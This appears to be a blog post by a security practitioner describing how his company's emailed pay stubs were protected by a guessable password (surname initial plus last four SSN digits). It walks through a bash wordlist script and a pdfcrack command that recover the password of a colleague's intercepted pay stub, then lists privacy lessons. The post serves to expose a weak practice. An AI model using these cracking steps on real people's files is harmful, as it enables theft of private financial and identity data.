One area that was also overlooked, dealt with our company pay_stubs presentations. Yes our own pay information was exposed for the taking to anybody that could intercept email, and had any basic simple skills as a scripter.
Every 2 weeks we would get a clear body text email with a single email attachment that said the "companyname_paystub.pdf". It was a basic PDF password protected document, I redacted the company name from this posting to protect that of the guilty, but it looked something like this;
Okay simple right.
Yes in deed, it was simple to hack. In this case the details of the victim was in the body of the email. The email would provide you the clues to the password. And yes I'm not making this up, the clues where ;
- 1st letter of your lastname
- last 4 of your SSN
- and we could easily enumerate the user name from mailto: address of the email
Yeap all of that was in a clear-text, non encrypted email, & with a simple password protected pdf attachment that was sent thru possible unlimited or numerous mail/internet hops. So if you where between our mailserver and the business that built or e-PayStubs, you could easily harvest privacy information.
Okay I admire they where trying to be green & with saving a tree or two, plus generating less paper, but when you provide sensitive information in a email, and then give clues on how to crack it. Something is not right !
So let's look how I cracked this using one of my favorite tools known as pdfcrack.
Okay 1st let's review the clues;
we need a dictionary file that contains the 1st letter of the last name followed by 4 digits. So the victim in this case, was an email that was intercepted accidentlly by myself. The victim last name started with d, so that told me that I need a combinations of d0000-9999.
NOTE: The last name of the victim could easily be extracted from the email recipient address and/or by a little social engineering or a simple directory look up if you had a phone systems that provided the calling party a directory listing. These systems are cool, but can lead to recon'd information about your employees and I typically frown upon them, but they do exist in all sorts of business.
Okay simple let's move on and look at how we cracked this egg wide open;
1st I crafted a crude script to generate my dictionary file. My perl scripting skills are bad, so I used a simple bash shell script or something like the following to build my dictionary;
100:~ kenfelix1$ cat makedict1.sh
#!/bin/bash
#
# ken felix the hacker @ hyperfeed dot com keeping-her-afe :)
#
# my crude simple script for making my dictionary files 0000-thru-9999
# insert the 1st character of the lastname on the cmd line
for ((a=1; a <= 9999 ; a++))
do echo $1$a
done
for ((b=10000000; b <= 10009999 ; b++))
do echo $1$b
done
The reason for the 2nd loop entry, was because I had no quick ideal or way on how to make sequences #s 0000-0999, so the 2 above loops when executed, and the output redirected to a file, this gives you the sequence #s of 1-thru-10009999 & with your supplied the cmd line variable of the 1st character of the victims last name.
2nd I then used a combination of the unix cat and sed cmds to clean the file up some.
100:~ kenfelix1$ ./makedict1.sh d > myhackingfile.txt ; sed s/d1000/d/g myhackingfile.txt > final.txt
100:~ kenfelix1$ cat final.txt | wc -l
19999
100:~ kenfelix1$
Okay it's a little bigger than planned, but still the file is small in size , and will cover the objected of breaking the password encrypted pdf file.
3rd Okay so now I have this file starting with;
100:~ kenfelix1$ cat final.txt | head -n 3
d1
d2
d3
and ending with;
100:~ kenfelix1$ cat final.txt | tail -n 3
d9997
d9998
d9999
So that meets my password range for the victims paystub. With pdfcrack you can now supply the wordlist against the pdf file, by execution of the following cmd;
pdfcrack -w "supplied dictionary wordlist" -f "targeted pdf"
And that will crack the pdf file with your wordlist & if a match is found. So let's run it with my wordlist and against the PDF file;
# pdfcrack -w final.txt victim_paystub.pdf
PDF version 1.4
Security Handler: Standard
V: 2
R: 3
P: -4
Length: 128
Encrypted Metadata: True
FileID: 8ad5392d2b990944a5b5f7ba1d3b000d
U: 61e8eae0e2f9ebd5020487b4c504e19700000000000000000000000000000000
O: 1dbee41c901b7b6c50e4b965eb983b6cf989135e1b37c46a9e0b0cdcc2c89a4d
found-user-password: "d6832
So their you have it, a very simple hack.
Things we all should take away from this post;
- be careful not to leak sensitive or classified information into a email
- don't apply password clues or hints in a unsecured channel
- protect your clients privacy
- just as important protect your employees privacy
I hope this post was helpful
Ken Felix
Freelance Network Security Personnel
kfelix at hyperfeed dot com
No comments:
Post a Comment